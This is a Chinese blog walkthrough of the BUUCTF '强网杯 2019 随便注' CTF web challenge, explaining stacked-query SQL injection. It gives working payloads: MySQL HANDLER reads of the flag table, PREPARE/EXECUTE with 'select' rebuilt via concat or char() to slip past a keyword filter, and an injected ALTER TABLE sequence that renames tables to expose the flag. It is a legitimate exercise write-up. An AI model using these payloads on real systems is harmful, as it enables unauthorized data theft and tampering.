BUUCTF之[强网杯 2019]随便注 -------堆叠查询

最新推荐文章于 2023-02-05 22:04:08 发布
最新推荐文章于 2023-02-05 22:04:08 发布
阅读量231 收藏 1
点赞数 2
分类专栏: Classical CTF-WEB 注入 文章标签: mysql 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118737571
版权
CTF-WEB 同时被 3 个专栏收录
40 篇文章 4 订阅
订阅专栏
Classical
12 篇文章 0 订阅
订阅专栏
注入
10 篇文章 0 订阅
订阅专栏

BUUCTF之[强网杯 2019]随便注 -------堆叠查询

题目
在这里插入图片描述
一开始以为这个是简单的SQL注入,结果是堆叠查询。。。。
关于堆叠查询有几个要记的知识点:

  1. show databases; //显示所有数据库
  2. show tables; // 显示所有表名
  3. show columns from 【表名】; // 显示对应表名里列的信息
  4. desc 【表名】; // 显示详细的表名信息

在这里插入图片描述
在这里插入图片描述
·
注意这里的表名需要用到反单引号,即`1919810931114514`。这个应该是和数据库的表名有关系
在这里插入图片描述

·
·
对了,还有一点忘记说。这里过滤了的关键词有这些:select,update,delete,drop,insert,where。并且是不区分大小写的。
在这里插入图片描述

`
`
解题思路一:
MySQL中查询语句handler:

  1. handler 【表名】 open; // 打开某个表
  2. handler 【表名】 read first || next; // 读取表里第一行或者下一行的数据
  3. handler 【表名】 close; // 关闭该表

由于flag是在`1919810931114514`这个表里(注意这里的反单引号是必须加的`),所以步骤是:

handler `1919810931114514` open;
handler `1919810931114514` read first;
handler `1919810931114514` close;

在这里插入图片描述

·
·
解题思路二:
基本步骤为:

  1. PREPARE 【自定义名】 FROM 【自定义的SQL查询语句】;
  2. EXECUTE 【自定义名】;
  3. DEALLOCATE PREPARE 【自定义名】;

所以这里的查询语句可以为:

PREPARE Hack_SQL FROM select flag from `1919810931114514`;
EXECUTE  Hack_SQL ;
DEALLOCATE  PREPARE Hack_SQL;

但是很可惜,这里的select被过滤了。所以需要换一下思路!在这里插入图片描述

PREPARE Hack_SQL from concat('s','elect', ' * from `1919810931114514` ');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;

或者

PREPARE Hack_SQL from concat(char(115,101,108,101,99,116), ' * from `1919810931114514`');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;#

其中这里的115,101,108,101,99,116转换为ascii码就是select

十进制数Ascii码
97a
98b
99c
100d
101e
102f
103g
104h
105i
106j
107k
108l
109m
110n
111o
112p
113q
114r
115s
116t
117u
118v
119w
120x
121y
122z

解题思路三:
由于前端提供查询的数据库为words,但是flag在数据库1919810931114514里。并且可以猜测后台的SQL查询语句为:select * from words where id=【你输入的id】

  1. 所以我们需要先将数据库words改成其它的数据库名
  2. 再把数据库1919810931114514改名为words
  3. 并且把(改名前)1919810931114514数据库的字段flag改名成id

所以这里的payload可以为:

1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);

在这里插入图片描述

总结:
之前做CTF看到Handler和Prepare这两种的解法的时候,就想着这些MySQL的术语我根本不会啊啊啊啊!接下来该怎么学啊。但是后来堆叠查询见的多,Handler和Prepare也见了好几次。就不再觉得那么陌生了,然后就慢慢学会这种解题方法了。。。

至于解题三,那个其实是在网上看到别人的WP才知道。大佬果然是大佬,,,,

参考链接

若丶时光破灭
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL入之堆叠查询
m0_56578216的博客
08-23 253
结束一个sql语句后继续构造下一条语句,会不会一起执行?而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。在http://127.0.0.1/sqli-labs-master/中点击Setup/reset Database for labs重新建立一个sqli-labs数据库。分割,它和联合查询不同的地方在于,密码都为654321,修改成功!
MySQL堆叠查询
u014650965的博客
06-20 266
堆叠查询攻击及预防办法
BUUCTF--[GUET-CTF2019]re
Hk_Mayfly的博客
04-07 1111
测试文件:https://www.lanzous.com/ib3elba 脱壳 获取信息 64位文件 upx加壳 代码分析 1 __int64 sub_400E28() 2 { 3 const char *v0; // rdi 4 __int64 result; // rax 5 __int64 v2; // rdx 6 unsigned _...
BUUCTF-[极客大挑战 2019]BuyFlag
qq_43006864的博客
01-20 2702
打开题目。 好像没啥,右上角发现个菜单按钮,点开看看。 看到中间写了。flag需要100000000money。 然后attention这里写着,如果你需要FLAG,你必须是一名叫cuit的学生,你必须正确回答password。然后继续查看源码,发现了这一段代码。 让我们post money和password。然后password不能为数字,然后password必须等于404才返回正确,那这里我们可以通过弱类型来找过,就是404后面加上字母。 抓包看..
BUUCTF [强网杯 2019]随便
m0_49025459的博客
04-17 2229
题目 打开环境发现是经典的提交界面 老规则还是查询入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了,那没办法了,只好去查查大佬的文章,发现需要使用堆叠查询 那就搞起,查数据库 0'; show databases; # 爆表,发现俩表 0'; show tables; # 爆表中的数据 0';show columns from words;# 0';sho...
BUUCTFweb强网杯2019随便
12-14
看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ ...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
`parse_str()`函数用于解析URL查询字符串并将其转化为PHP变量。同样,如果将未经验证的用户输入传递给此函数,攻击者可能控制变量名和值,实现变量覆盖。 4. **import_request_variables()函数**: 此函数会将...
BUUCTF-MISC-WP(详细解题思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解题思路)
WEB安全渗透测试》(5)SQL入实战:堆叠查询
午夜安全
10-03 6600
WEB安全渗透测试》(5)SQL入实战:堆叠查询堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
Web安全原理剖析(六)——堆叠查询入攻击
热门推荐
Phantom03167的博客
09-16 1万+
堆叠查询入攻击
堆叠查询入攻击
小城的博客
01-28 551
堆叠入原理及介绍 Stacked injections:堆叠入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下 一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injectio
WEB漏洞-SQL入之堆叠查询及WAF绕过
xhscxj的博客
01-17 944
堆叠入 语句: select username from user where id = 1;select password from user; 在原本的语句后面加上分号使其结束,再在后面写上另外的查询语句。 相当于自己又加入了一条查询语句,两条语句一起查询堆叠入实现例子 后面加入的语句与功能自己按需要构造 绕过WAF 安全狗 提交方式绕过 目标网站有安全狗,并对url进行拦截时 如果目标网站的接收方式是$_REQUEST(即可接收GET提交,也可以接收POST提交),则可以,通过post
【SQL入-7】堆叠查询入与waf绕过
qq_41889600的博客
11-03 284
堆叠入 waf绕过
算法分析:BUUCTF-2019全国赛的一道逆向题
m0_64973256的博客
04-13 214
1.对程序进行查壳,发现是个无壳vc编译的 2.运行程序,查看程序运行流程,在password中输入12345678,按下Crack按钮以后没有任何提示程序结束运行 3.依旧先让od跑一遍,以前说过的这种通过用户输入然后再按下按钮触发事件的先对GetDlgItemTextA函数断点看程序是否是用这个函数从输入框获取用户输入的 在输入框输入12345678按下Crack按钮后成功在GetDlgItemTextA函数断下,由于我们的断点是GetDlgItemTextA函数的入口点,属于系统
【SQL入漏洞-07】堆叠查询靶场实战
cc
02-05 5972
堆叠查询的局限性: 堆叠入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。如上面的实例如果我们不输出密码那我们是看不到这个结果的。因此,在读取数据时,我们建议使用union(联合)
BUUCTF [GXYCTF2019]BabySQli 1
lzu_lfl的博客
10-06 350
union联合查询生成虚拟数据
Sql漏洞入之堆叠
Matheus的博客
07-30 1134
堆叠堆叠查询入介绍 Stackedinjections:堆叠入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而 unioninje
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值